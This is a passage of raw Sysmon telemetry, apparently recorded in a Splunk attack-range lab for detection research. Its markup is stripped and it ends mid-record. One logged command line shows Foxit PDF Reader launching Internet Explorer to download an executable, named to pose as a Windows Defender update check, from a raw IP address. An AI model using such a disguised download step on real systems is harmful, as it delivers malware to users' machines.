Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.366{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041899Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.239{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000041898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.102{FE4C2B44-D9F5-63C7-1300-00000000AF02}10361320C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.096{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.096{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.095{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.095{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.095{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.095{FE4C2B44-E326-63C7-F905-00000000AF02}32605208C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9888(wow64)|C:\Windows\System32\KERNELBASE.dll+d856c(wow64)|C:\Windows\System32\windows.storage.dll+1c6716(wow64)|C:\Windows\System32\windows.storage.dll+1c63d1(wow64)|C:\Windows\System32\windows.storage.dll+1c64a3(wow64)|C:\Windows\System32\windows.storage.dll+1c7175(wow64)|C:\Windows\System32\windows.storage.dll+1c6021(wow64)|C:\Windows\System32\windows.storage.dll+1c8182(wow64)|C:\Windows\System32\windows.storage.dll+1c85ec(wow64)|C:\Windows\System32\windows.storage.dll+1c8035(wow64)|C:\Windows\System32\SHELL32.dll+1a9394(wow64)|C:\Windows\System32\SHELL32.dll+1a926e(wow64)|C:\Windows\System32\SHELL32.dll+1a9069(wow64) 154100x800000000000000041891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.084{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe11.00.14393.2007 (rs1_release.171231-1800)Internet ExplorerInternet ExplorerMicrosoft CorporationIEXPLORE.EXE"C:\Program Files\Internet Explorer\iexplore.exe" http://45.139.105.143/d/rsWinDefendUpdateCheck.exeC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2HighMD5=DED3D744D46A5CE7965CE2B75B54958A,SHA256=70C9616C026266BB3A1213BCC50E3A9A24238703FB7745746628D11163905D2F,IMPHASH=9BB01C801600CEBDCA166D0534E98CE6{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe"C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe" 10341000x800000000000000041890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.083{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.077{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005692C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8957f|C:\Windows\System32\SHELL32.dll+8a4a5|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.077{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005692C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+8a3be|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:12.077{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005692C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\SHELL32.dll+897d4|C:\Windows\System32\SHELL32.dll+8a387|C:\Windows\Explorer.EXE+3c648|C:\Windows\Explorer.EXE+3c4d4|C:\Windows\Explorer.EXE+3c441|C:\Windows\System32\windows.storage.dll+12703f|C:\Windows\System32\windows.storage.dll+125dbf|C:\Windows\System32\windows.storage.dll+19d7df|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000016525Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:13.383{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1CA0DEC11F6B29A09CED42CD54AA1E3,SHA256=5363C7AD69F6622E460056D65E619D0F0C61B5D20AAAFC1CC8E3B4A29DBCFB3F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041966Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.703{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041965Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.703{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041964Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.703{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041963Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.685{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041962Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.685{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041961Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.685{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000041960Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.428{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\system32\explorerframe.dll+154e|C:\Windows\SYSTEM32\IEFRAME.dll+a6672|C:\Windows\SYSTEM32\IEFRAME.dll+9c25a|C:\Windows\SYSTEM32\IEFRAME.dll+9d799|C:\Windows\SYSTEM32\IEFRAME.dll+9df92|C:\Windows\SYSTEM32\IEFRAME.dll+64998|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b8d|C:\Windows\SYSTEM32\IEFRAME.dll+a585b|C:\Windows\SYSTEM32\IEFRAME.dll+cf83b|C:\Windows\SYSTEM32\IEFRAME.dll+f94d8|C:\Windows\SYSTEM32\IEFRAME.dll+f93e0|C:\Windows\SYSTEM32\IEFRAME.dll+c89bd|C:\Windows\SYSTEM32\IEFRAME.dll+2a7b76|C:\Windows\SYSTEM32\IEFRAME.dll+152ad4|C:\Windows\SYSTEM32\IEFRAME.dll+da62d 10341000x800000000000000041959Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.428{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+a6672|C:\Windows\SYSTEM32\IEFRAME.dll+9c25a|C:\Windows\SYSTEM32\IEFRAME.dll+9d799|C:\Windows\SYSTEM32\IEFRAME.dll+9df92|C:\Windows\SYSTEM32\IEFRAME.dll+64998|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b8d|C:\Windows\SYSTEM32\IEFRAME.dll+a585b|C:\Windows\SYSTEM32\IEFRAME.dll+cf83b|C:\Windows\SYSTEM32\IEFRAME.dll+f94d8|C:\Windows\SYSTEM32\IEFRAME.dll+f93e0|C:\Windows\SYSTEM32\IEFRAME.dll+c89bd|C:\Windows\SYSTEM32\IEFRAME.dll+2a7b76|C:\Windows\SYSTEM32\IEFRAME.dll+152ad4 10341000x800000000000000041958Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.428{FE4C2B44-E474-63C7-2706-00000000AF02}7043176C:\Program Files\Internet Explorer\iexplore.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\system32\explorerframe.dll+1501|C:\Windows\SYSTEM32\IEFRAME.dll+a6672|C:\Windows\SYSTEM32\IEFRAME.dll+9c25a|C:\Windows\SYSTEM32\IEFRAME.dll+9d799|C:\Windows\SYSTEM32\IEFRAME.dll+9df92|C:\Windows\SYSTEM32\IEFRAME.dll+64998|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\SYSTEM32\iertutil.dll+32b8d|C:\Windows\SYSTEM32\IEFRAME.dll+a585b|C:\Windows\SYSTEM32\IEFRAME.dll+cf83b|C:\Windows\SYSTEM32\IEFRAME.dll+f94d8|C:\Windows\SYSTEM32\IEFRAME.dll+f93e0|C:\Windows\SYSTEM32\IEFRAME.dll+c89bd|C:\Windows\SYSTEM32\IEFRAME.dll+2a7b76|C:\Windows\SYSTEM32\IEFRAME.dll+152ad4|C:\Windows\SYSTEM32\IEFRAME.dll+da62d 10341000x800000000000000041957Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.272{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000041956Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.173{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8DEB77C7B47B959DFA0C831F94AD099F,SHA256=5AA737EF4BC3FB42736DB6FE8A2D7B16D95B4DB1B39F9574CB2F7CFE098B888F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041955Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:13.157{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet 